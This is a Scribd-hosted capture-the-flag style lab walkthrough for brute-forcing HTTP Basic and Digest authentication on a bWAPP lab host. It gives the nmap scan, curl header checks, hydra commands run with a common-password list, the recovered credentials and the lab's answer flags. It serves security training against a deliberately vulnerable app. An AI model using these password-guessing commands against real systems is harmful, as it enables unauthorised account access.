Scribd
Upload
257 views

Attacking HTTP Authentication With Hydraâ (Session 1)

This document provides instructions for using Hydra to crack HTTP Basic and Digest authentication on a vulnerable web application. It outlines steps to determine the target IP, scan for services, identify the authentication type used for different directories, and use Hydra with username lists to crack the credentials. Hydra is able to retrieve the credentials for the /basic directory with username "admin" and password "cookie1" and the /digest directory with username "admin" and password "adminpasswd".

Uploaded by

vifeneb962
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
257 views

Attacking HTTP Authentication With Hydraâ (Session 1)

This document provides instructions for using Hydra to crack HTTP Basic and Digest authentication on a vulnerable web application. It outlines steps to determine the target IP, scan for services, identify the authentication type used for different directories, and use Hydra with username lists to crack the credentials. Hydra is able to retrieve the credentials for the /basic directory with username "admin" and password "cookie1" and the /digest directory with username "admin" and password "adminpasswd".

Uploaded by

vifeneb962
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Name Attacking HTTP Authentication with Hydra

URL https://attackdefense.com/challengedetails?cid=1894

Type Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1:​ Determining the IP address of the target machine.

Command:​ ifconfig
The IP address of the host machine is 192.209.143.2

Therefore, the target machine has IP address 192.209.143.3

Step 2:​ Scan the target machine using nmap.

Command:​ nmap 192.209.143.3

We have discovered that HTTP and MYSQL services are running on the target machine.

Step 3:​ Checking the application available on port 80 of the target machine.

Open the following URL in firefox:

URL:​ http://192.209.143.3
bWAPP application is hosted on the target machine.

Visit the endpoint: “/basic”

URL:​ http://192.209.143.3/basic
Enter some random username / password.
Since the username / password combination is wrong the credentials would be prompted again.

Click on the “Cancel” button this time.

The page shown above would be shown in response, indicating that we are not authorized to
view this page.

Checking the /digest directory:

Visit the endpoint: “/digest”

URL:​ http://192.209.143.3/digest
Even this directory is password protected. Click the “Cancel” button and switch to
command-line.

Step 4:​ Identifying the type of authentication used for the /basic and /digest directories.

Identification of the authentication used for /basic by checking the request header:

Command:​ curl -I 192.209.143.3/basic/

Note:​ -I option is the same as --head. It is used to fetch the headers only.
Identification of the authentication used for /digest by checking the request header:

Command:​ curl -I 192.209.143.3/digest/

Step 5:​ Using hydra to crack the Basic and Digest Auth.

Checking the usage of hydra:

Command:​ hydra

Notice that the help message shows all the supported services and also shows an example
command in the end.
Cracking Basic Auth using hydra:

Command:​ hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt


192.209.143.3 http-get /basic/

So, for the /basic directory, the credentials are:

Username:​ admin
Password:​ cookie1

Accessing /basic/ using curl using the credentials retrieved using hydra:

Command:​ curl -u admin:cookie1 192.209.143.3/basic/

Accessing /basic using browser:


Enter the credentials obtained using hydra:

Flag:​ d25db4ce54b60b49dfd7b32c52ed8d26

Cracking Digest Auth using hydra:

Command:​ hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt


192.209.143.3 http-get /digest/

So, for the /digest directory, the credentials are:


Username:​ admin
Password:​ adminpasswd

Accessing /digest/ using curl using the credentials retrieved using hydra:

Command:​ curl --digest -u admin:adminpasswd 192.209.143.3/digest/

Accessing /digest using browser:

Enter the credentials obtained using hydra:

Flag:​ 9aae03448d62145a8b462858d54434de
References:

1. Hydra (​https://github.com/vanhauser-thc/thc-hydra​)

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy